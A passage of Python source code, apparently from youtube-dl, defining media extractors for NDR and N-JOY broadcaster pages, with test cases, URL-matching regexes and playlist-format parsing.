'url': 'http://www.ndr.de/info/La-Valette-entgeht-der-Hinrichtung,audio51535.html',
'md5': 'bb3cd38e24fbcc866d13b50ca59307b8',
'info_dict': {
'id': 'audio51535',
'display_id': 'La-Valette-entgeht-der-Hinrichtung',
'ext': 'mp3',
'title': 'La Valette entgeht der Hinrichtung',
'description': 'md5:22f9541913a40fe50091d5cdd7c9f536',
'uploader': 'ndrinfo',
'timestamp': 1290626100,
'upload_date': '20140729',
'duration': 884,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.ndr.de/Fettes-Brot-Ferris-MC-und-Thees-Uhlmann-live-on-stage,festivalsommer116.html',
'only_matching': True,
}]
def _extract_embed(self, webpage, display_id):
embed_url = self._html_search_meta(
'embedURL', webpage, 'embed URL', fatal=True)
description = self._search_regex(
r'<p[^>]+itemprop="description">([^<]+)</p>',
webpage, 'description', default=None) or self._og_search_description(webpage)
timestamp = parse_iso8601(
self._search_regex(
r'<span[^>]+itemprop="(?:datePublished|uploadDate)"[^>]+content="([^"]+)"',
webpage, 'upload date', fatal=False))
return {
'_type': 'url_transparent',
'url': embed_url,
'display_id': display_id,
'description': description,
'timestamp': timestamp,
}
class NJoyIE(NDRBaseIE):
IE_NAME = 'njoy'
IE_DESC = 'N-JOY'
_VALID_URL = r'https?://(?:www\.)?n-joy\.de/(?:[^/]+/)*(?:(?P<display_id>[^/?#]+),)?(?P<id>[\da-z]+)\.html'
_TESTS = [{
# httpVideo, same content id
'url': 'http://www.n-joy.de/entertainment/comedy/comedy_contest/Benaissa-beim-NDR-Comedy-Contest,comedycontest2480.html',
'md5': 'cb63be60cd6f9dd75218803146d8dc67',
'info_dict': {
'id': 'comedycontest2480',
'display_id': 'Benaissa-beim-NDR-Comedy-Contest',
'ext': 'mp4',
'title': 'Benaissa beim NDR Comedy Contest',
'description': 'md5:f057a6c4e1c728b10d33b5ffd36ddc39',
'uploader': 'ndrtv',
'upload_date': '20141129',
'duration': 654,
},
'params': {
'skip_download': True,
},
}, {
# httpVideo, different content id
'url': 'http://www.n-joy.de/musik/Das-frueheste-DJ-Set-des-Nordens-live-mit-Felix-Jaehn-,felixjaehn168.html',
'md5': '417660fffa90e6df2fda19f1b40a64d8',
'info_dict': {
'id': 'dockville882',
'display_id': 'Das-frueheste-DJ-Set-des-Nordens-live-mit-Felix-Jaehn-',
'ext': 'mp4',
'title': '"Ich hab noch nie" mit Felix Jaehn',
'description': 'md5:85dd312d53be1b99e1f998a16452a2f3',
'uploader': 'njoy',
'upload_date': '20150822',
'duration': 211,
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.n-joy.de/radio/webradio/morningshow209.html',
'only_matching': True,
}]
def _extract_embed(self, webpage, display_id):
video_id = self._search_regex(
r'<iframe[^>]+id="pp_([\da-z]+)"', webpage, 'embed id')
description = self._search_regex(
r'<div[^>]+class="subline"[^>]*>[^<]+</div>\s*<p>([^<]+)</p>',
webpage, 'description', fatal=False)
return {
'_type': 'url_transparent',
'ie_key': 'NDREmbedBase',
'url': 'ndr:%s' % video_id,
'display_id': display_id,
'description': description,
}
class NDREmbedBaseIE(InfoExtractor):
IE_NAME = 'ndr:embed:base'
_VALID_URL = r'(?:ndr:(?P<id_s>[\da-z]+)|https?://www\.ndr\.de/(?P<id>[\da-z]+)-ppjson\.json)'
_TESTS = [{
'url': 'ndr:soundcheck3366',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/soundcheck3366-ppjson.json',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id') or mobj.group('id_s')
ppjson = self._download_json(
'http://www.ndr.de/%s-ppjson.json' % video_id, video_id)
playlist = ppjson['playlist']
formats = []
quality_key = qualities(('xs', 's', 'm', 'l', 'xl'))
for format_id, f in playlist.items():
src = f.get('src')
if not src:
continue
ext = determine_ext(src, None)
if ext == 'f4m':
formats.extend(self._extract_f4m_formats(
src + '?hdcore=3.7.0&plugin=aasp-3.7.0.39.44', video_id,
f4m_id='hds', fatal=False))
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
src, video_id, 'mp4', m3u8_id='hls',
entry_protocol='m3u8_native', fatal=False))
else:
quality = f.get('quality')
ff = {
'url': src,
'format_id': quality or format_id,
'quality': quality_key(quality),
}
type_ = f.get('type')
if type_ and type_.split('/')[0] == 'audio':
ff['vcodec'] = 'none'
ff['ext'] = ext or 'mp3'
formats.append(ff)
self._sort_formats(formats)
config = playlist['config']
live = playlist.get('config', {}).get('streamType') in ['httpVideoLive', 'httpAudioLive']
title = config['title']
if live:
title = self._live_title(title)
uploader = ppjson.get('config', {}).get('branding')
upload_date = ppjson.get('config', {}).get('publicationDate')
duration = int_or_none(config.get('duration'))
thumbnails = [{
'id': thumbnail.get('quality') or thumbnail_id,
'url': thumbnail['src'],
'preference': quality_key(thumbnail.get('quality')),
} for thumbnail_id, thumbnail in config.get('poster', {}).items() if thumbnail.get('src')]
return {
'id': video_id,
'title': title,
'is_live': live,
'uploader': uploader if uploader != '-' else None,
'upload_date': upload_date[0:8] if upload_date else None,
'duration': duration,
'thumbnails': thumbnails,
'formats': formats,
}
class NDREmbedIE(NDREmbedBaseIE):
IE_NAME = 'ndr:embed'
_VALID_URL = r'https?://(?:www\.)?ndr\.de/(?:[^/]+/)*(?P<id>[\da-z]+)-(?:player|externalPlayer)\.html'
_TESTS = [{
'url': 'http://www.ndr.de/fernsehen/sendungen/ndr_aktuell/ndraktuell28488-player.html',
'md5': '8b9306142fe65bbdefb5ce24edb6b0a9',
'info_dict': {
'id': 'ndraktuell28488',
'ext': 'mp4',
'title': 'Norddeutschland begrüßt Flüchtlinge',
'is_live': False,
'uploader': 'ndrtv',
'upload_date': '20150907',
'duration': 132,
},
}, {
'url': 'http://www.ndr.de/ndr2/events/soundcheck/soundcheck3366-player.html',
'md5': '002085c44bae38802d94ae5802a36e78',
'info_dict': {
'id': 'soundcheck3366',
'ext': 'mp4',
'title': 'Ella Henderson braucht Vergleiche nicht zu scheuen',
'is_live': False,
'uploader': 'ndr2',
'upload_date': '20150912',
'duration': 3554,
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.ndr.de/info/audio51535-player.html',
'md5': 'bb3cd38e24fbcc866d13b50ca59307b8',
'info_dict': {
'id': 'audio51535',
'ext': 'mp3',
'title': 'La Valette entgeht der Hinrichtung',
'is_live': False,
'uploader': 'ndrinfo',
'upload_date': '20140729',
'duration': 884,
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/visite/visite11010-externalPlayer.html',
'md5': 'ae57f80511c1e1f2fd0d0d3d31aeae7c',
'info_dict': {
'id': 'visite11010',
'ext': 'mp4',
'title': 'Visite - die ganze Sendung',
'is_live': False,
'uploader': 'ndrtv',
'upload_date': '20150902',
'duration': 3525,
},
'params': {
'skip_download': True,
},
}, {
# httpVideoLive
'url': 'http://www.ndr.de/fernsehen/livestream/livestream217-externalPlayer.html',
'info_dict': {
'id': 'livestream217',
'ext': 'flv',
'title': r're:^NDR Fernsehen Niedersachsen \d{4}-\d{2}-\d{2} \d{2}:\d{2}$',
'is_live': True,
'upload_date': '20150910',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.ndr.de/ndrkultur/audio255020-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/nordtour/nordtour7124-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/kultur/film/videos/videoimport10424-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/hamburg_journal/hamj43006-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/weltbilder/weltbilder4518-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/doku952-player.html',
'only_matching': True,
}]
class NJoyEmbedIE(NDREmbedBaseIE):
IE_NAME = 'njoy:embed'
_VALID_URL = r'https?://(?:www\.)?n-joy\.de/(?:[^/]+/)*(?P<id>[\da-z]+)-(?:player|externalPlayer)_[^/]+\.html'
_TESTS = [{
# httpVideo
'url': 'http://www.n-joy.de/events/reeperbahnfestival/doku948-player_image-bc168e87-5263-4d6d-bd27-bb643005a6de_theme-n-joy.html',
'md5': '8483cbfe2320bd4d28a349d62d88bd74',
'info_dict': {
'id': 'doku948',
'ext': 'mp4',
'title': 'Zehn Jahre Reeperbahn Festival - die Doku',
'is_live': False,
'upload_date': '20150807',
'duration': 1011,
},
}, {
# httpAudio
'url': 'http://www.n-joy.de/news_wissen/stefanrichter100-player_image-d5e938b1-f21a-4b9a-86b8-aaba8bca3a13_theme-n-joy.html',
'md5': 'd989f80f28ac954430f7b8a48197188a',
'info_dict': {
'id': 'stefanrichter100',
'ext': 'mp3',
'title': 'Interview mit einem Augenzeugen',
'is_live': False,
'uploader': 'njoy',
'upload_date': '20150909',
'duration': 140,
},
'params': {
'skip_download': True,
},
}, {
# httpAudioLive, no explicit ext
'url': 'http://www.n-joy.de/news_wissen/webradioweltweit100-player_image-3fec0484-2244-4565-8fb8-ed25fd28b173_theme-n-joy.html',
'info_dict': {
'id': 'webradioweltweit100',
'ext': 'mp3',
'title': r're:^N-JOY Weltweit \d{4}-\d{2}-\d{2} \d{2}:\d{2}$',
'is_live': True,
'uploader': 'njoy',
'upload_date': '20150810',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.n-joy.de/musik/dockville882-player_image-3905259e-0803-4764-ac72-8b7de077d80a_theme-n-joy.html',
'only_matching': True,
}, {
'url': 'http://www.n-joy.de/radio/sendungen/morningshow/urlaubsfotos190-player_image-066a5df1-5c95-49ec-a323-941d848718db_theme-n-joy.html',
'only_matching': True,
}, {
'url': 'http://www.n-joy.de/entertainment/comedy/krudetv290-player_image-ab261bfe-51bf-4bf3-87ba-c5122ee35b3d_theme-n-joy.html',
'only_matching': True,
}]
| unlicense |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.